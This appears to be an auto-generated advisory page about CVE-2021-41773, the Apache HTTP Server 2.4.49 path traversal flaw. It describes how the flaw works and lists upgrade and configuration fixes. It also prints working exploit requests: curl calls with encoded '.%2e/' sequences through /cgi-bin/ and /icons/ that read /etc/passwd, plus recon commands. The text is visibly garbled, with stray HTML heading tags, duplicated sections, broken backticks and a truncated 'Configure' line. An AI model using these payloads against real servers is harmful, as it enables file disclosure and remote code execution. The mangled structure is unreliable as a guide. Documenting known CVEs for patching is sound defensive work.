Listen to this Post
How the mentioned CVE works:
A flaw was introduced in Apache HTTP Server 2.4.49 with a change to the path normalization algorithm. The vulnerability, CVE-2021-41773, arises due to insufficient validation of user-supplied input within the path normalization process. An attacker can exploit a path traversal weakness by sending a crafted request containing encoded characters, such as .%2e/, to bypass security checks. If files outside the document root are not protected by a `require all denied` configuration, the request can map to unintended directories. This allows for reading arbitrary files from the server’s filesystem. Furthermore, if CGI scripts are enabled, this traversal flaw can be leveraged to achieve remote code execution by passing malicious input to a dynamic script, effectively granting the attacker command execution on the underlying host with the privileges of the web server process.
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
date: 2021-10-05
Prediction: Patch released (2021-10-05)
What Undercode Say:
`curl -H “Content-Type: application/json” -X GET http://api.cvedetails.com/json-feed.php?cveid=CVE-2021-41773`
`grep -r “Alias” /etc/apache2/sites-enabled/</h2>
<h2 style="color: blue;">find /var/www -name “.cgi” -type f</h2>
<h2 style="color: blue;">cat /etc/passwd</h2>
<h2 style="color: blue;">How Exploit:</h2>
`curl http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`
`curl http://target.com/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`
<h2 style="color: blue;">Protection from this CVE:</h2>
<h2 style="color: blue;">Immediate upgrade to 2.4.50.</h2>
<h2 style="color: blue;">Configurerequire all denied`.
<h2 style="color: blue;">
<h2 style="color: blue;">
<h2 style="color: blue;">How Exploit:</h2>
`curl http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`
`curl http://target.com/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`
<h2 style="color: blue;">Protection from this CVE:</h2>
<h2 style="color: blue;">Immediate upgrade to 2.4.50.</h2>
<h2 style="color: blue;">Configure
Disable unused CGI scripts.
Implement strict WAF rules.
Impact:
Arbitrary file disclosure.
Remote Code Execution.
Complete system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
